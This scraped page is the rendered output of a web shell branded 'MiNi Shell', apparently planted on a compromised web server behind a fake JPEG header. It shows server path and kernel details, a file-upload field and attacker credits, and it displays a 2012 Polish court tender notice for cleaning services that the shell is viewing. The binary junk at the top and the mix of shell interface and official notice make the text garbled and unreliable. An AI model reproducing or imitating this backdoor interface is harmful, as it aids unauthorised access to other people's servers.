JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120719/259500-N-2012.html

<p class="kh_header"><b>Olsztyn: Świadczenie usługi utrzymania czystości w siedzibie Wojewódzkiego Sądu Administracyjnego w Olsztynie przy ul. Emilii Plater 1</b><br>
<b>Numer ogłoszenia: 259500 - 2012; data zamieszczenia: 19.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Sąd Administracyjny w Olsztynie , ul. Emilii Plater 1, 10-562 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5228000, faks 089 5228082.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi utrzymania czystości w siedzibie Wojewódzkiego Sądu Administracyjnego w Olsztynie przy ul. Emilii Plater 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest utrzymanie w stałej czystości pomieszczeń w obiekcie WSA w Olsztynie przy ul. Emilii Plater 1.
 Wykonawca :
1/ wykona usługę sprzątania własnym profesjonalnym sprzętem, właściwym do danego rodzaju prac i powierzchni oraz przy pomocy własnego personelu, którego imienny wykaz wraz z zawartymi umowami o pracę przedstawi Zamawiającemu przy podpisaniu umowy. 
2/ do codziennego sprzątania w obiekcie skieruje min. 3 osoby mające odpowiednie doświadczenie w przedmiocie zamówienia, niekarane. Sprzątanie obiektu odbywać się będzie w dni robocze w godzinach 1600  - 2200,
3/ będzie odnotowywał w zeszycie złożonym u pracownika ochrony budynku lub wyznaczonego pracownika Zamawiającego wszelkie widoczne nieprawidłowości 
w stanie poszczególnych pomieszczeń, urządzeń i umeblowania budynku oraz ewentualne uwagi dotyczące wykonania usług objętych przedmiotem zamówienia.
4/ zobowiązany jest w czasie wykonywania usług  do zapewnienia  należytego porządku, przestrzegania przepisów BHP i p.poż. na terenie siedziby sądu, ponosi odpowiedzialność za szkody powstałe w związku z realizacją usług, a także  wskutek  działań osób zatrudnionych przez Wykonawcę,
5/ zobowiązany jest do zachowania w tajemnicy wszelkich informacji uzyskanych 
w związku z wykonywaniem usług. 
6/ szczegółowy zakres usług kompleksowego sprzątania pomieszczeń znajdujących się w siedzibie Sądu:
CODZIENNIE:
1/ mycie na mokro powierzchni podłóg i schodów na klatkach schodowych
2/ czyszczenie na sucho hollu przy wejściu głównym wyłożonego granitem oraz schodów granitowych
3/ sprzątanie pokoi biurowych, sal narad, sali obrad, pomieszczeń socjalnych, pomieszczeń sanitarnych, pomieszczeń gospodarczych znajdujących się na parterze, 
I i IV piętrze budynku, w którym swoją siedzibę ma WSA w Olsztynie o łącznej powierzchni 2068,40m2 w tym:
- odkurzanie wykładzin i dywanów w pokojach biurowych,
- ścieranie kurzu i usuwanie plam z mebli, biurek, sprzętu technicznego (należy podnieść klawiaturę, piórnik, laptop, monitor, komputer i inne rzeczy ustawione na meblach 
i biurkach w celu usunięcia kurzu), 
- wycieranie krzeseł i foteli (powierzchni nie tapicerowanych),
- czyszczenie powierzchni urządzeń i sprzętu biurowego (za wyjątkiem monitora 
i klawiatury),
- opróżnianie koszy na śmieci i wymiana worków,
- utrzymanie czystości parapetów, klamek, włączników światła - kontaktów,
- sprzątanie i dezynfekcja toalet,
- sprzątanie pomieszczenia portiera zlokalizowanego w hollu głównym przy wejściu do budynku oraz znajdującej się przy tym pomieszczeniu lady informacyjnej,
- powiadamianie zamawiającego o zauważonych usterkach i awariach,
- wykonywanie innych czynności zleconych przez zamawiającego związanych 
z utrzymaniem czystości w pomieszczeniach,
- sprawdzanie czy wszystkie okna i drzwi na terenie Sądu są pozamykane.
RAZ W TYGODNIU:
- mycie drzwi wewnątrz budynku i drzwi pełnych wejściowych,
- utrzymanie czystości pomieszczeń piwnicznych,
- utrzymanie czystości podłóg w magazynach,
- mycie grzejników, metalowych części poręczy,
- wycieranie trudnodostępnych powierzchni takich jak wysokie szafy.
RAZ NA DWA TYGODNIE:
- mycie ścian wyłożonych płytkami ceramicznymi (toalety i pomieszczenia socjalne) 
i boazerią przy zastosowaniu odpowiednich środków konserwujących.
RAZ NA KWARTAŁ:
- konserwacja powierzchni kamiennych,
- gruntowne doczyszczanie powierzchni holi specjalistycznymi środkami oraz nanoszenie warstw ochronnych,
- mycie okien w salach rozpraw i pokojach narad znajdujących się przy salach rozpraw,
- czyszczenie i konserwacja balustrad i barierek ze stali nierdzewnej wewnątrz i na zewnątrz budynku.
RAZ NA PÓŁ ROKU: 
- gruntowne czyszczenie i zabezpieczenie powierzchni foteli i krzeseł biurowych 
w tym tapicerowanych,
- mycie punktów świetlnych,
- mycie okien
- gruntowne doczyszczanie powierzchni podłóg ciągów komunikacyjnych (1457,59 m2)
RAZ DO ROKU:
- czyszczenie wykładzin dywanowych na mokro.

2. Powierzchnie do sprzątania:
Pokoje biurowe, pomieszczenia sanitarne, klatka schodowa - parter - 572,30 m2
Pokoje biurowe, sale narad, sala obrad, pomieszczenia sanitarne, pomieszczenia socjalne - I piętro - 1178,54 m2
Pokoje biurowe, pomieszczenia sanitarne, klatka schodowa - IV piętro - 317,56 m2

razem powierzchnia do sprzątania: 2068,40m2

3.  Do obowiązków Wykonawcy należeć będzie sprzątanie w miarę potrzeb po niewielkich remontach, malowaniu pomieszczeń oraz ewentualnych awariach.
4. Zamawiający wymaga, by pokoje biurowe oraz pokoje socjalne były sprzątane kompleksowo, w tym ewentualne mycie naczyń, suszarki do naczyń, zraszanie, podlewanie i mycie kwiatów itp.
5. Zamawiający zapewni własne profesjonalne środki czystości oraz niezbędne środki dezynfekcyjne i zapachowe: odświeżacze powietrza do każdej z kabin WC i kostki 
w muszlach sedesowych, mydło w płynie, papier toaletowy, ręczniki papierowe do łazienek i pomieszczeń socjalnych, worki foliowe do koszy.
6. Sprzątanie winno odbywać się  poza godzinami pracy Sądu, czyli w dni robocze 
w godz.  1600 - 2200. Usługi  okresowe  mogą być  za zgodą Zamawiającego wykonywane  w wolne soboty.
7. Wykonawca winien uwzględniać wszelkie ewentualne uwagi i zalecenia Zamawiającego co do sposobu wykonywania usługi. 
8. Usługa winna być wykonywana przez personel posiadający aktualne zaświadczenie 
o stanie zdrowia i przeszkolony w zakresie przepisów BHP i ppoż.
9. Wykonawca zapewni na własny koszt pracownikom świadczącym usługę odzież roboczą z emblematem firmy.
10. Wykonawca przed zawarciem umowy przedstawi wykaz pracowników wraz 
z zawartymi umowami o pracę, skierowanych do wykonywania usług oraz będzie zawiadamiał pisemnie o każdorazowej zmianie pracowników. 
Wskazany personel musi legitymować się aktualnym zaświadczeniem o niekaralności potwierdzonym wypisem z ewidencji Krajowego Rejestru Karnego. W przypadku zmiany każdej z osób w trakcie trwania umowy, Wykonawca zobowiązany jest przed dopuszczeniem jej do pracy przedstawić Zamawiającemu zaświadczenie o niekaralności.
11. Wykonawca ponosi pełną odpowiedzialność za szkody powstałe w związku 
z realizacją usługi z przyczyn leżących po jego stronie.
12. Wykonawca ponosi pełną odpowiedzialność cywilno - prawną za ewentualne nieszczęśliwe wypadki powstałe w wyniku nienależytego wywiązywania się 
z podpisanej umowy.
13. Zamawiający zastrzega sobie prawo do żądania usunięcia z budynku WSA każdego 
z pracowników Wykonawcy, który poprzez swoje zachowanie i jakość wykonywanej pracy dał powód do uzasadnionych skarg.
14. W celu prawidłowego przygotowania  oferty zaleca się wizję lokalną na obiekcie Wojewódzkiego Sądu Administracyjnego w Olsztynie przy ul. Emilii Plater 1..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówień uzupełniających będą usługi sprzątania. Może ewentualnie nastąpić zwiększenie powierzchni do sprzątania o około 1000 m kwadratowych (holle i pokoje biurowe).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4, 90.91.13.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 29.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza i nie opisuje szczegółowo warunku w tym zakresie. Zamawiający oceni, czy Wykonawca spełnia warunki na podstawie złożonego wraz 
z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku posiadania wiedzy i doświadczenia Wykonawca winien przedstawić w ofercie wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych co najmniej 2 usług polegających na sprzątaniu obiektów użyteczności publicznej o powierzchni minimum 2 000 m2 każda usługa, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z  podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek w przypadku, gdy Wykonawca wykaże, iż jest ubezpieczony od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej, w tym zgodnej z przedmiotem niniejszego zamówienia, na kwotę minimum 250.000,00 zł (dwieście pięćdziesiąt tysięcy złotych). W przypadku, gdy  suma polisy ubezpieczeniowej wyrażona jest w walucie obcej, Zamawiający przeliczy sumę polisy na PLN wg średniego kursu NBP na dzień złożenia ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - doświadczenie - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wsa.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Sąd Administracyjny w Olsztynie
ul. Emilii Plater 1
10-562 Olsztyn
pok. 102.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2012 godzina 09:50, miejsce: Wojewódzki Sąd Administracyjny w Olsztynie
ul. Emilii Plater 1
10-562 Olsztyn
pok. 102 lub Biuro Podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com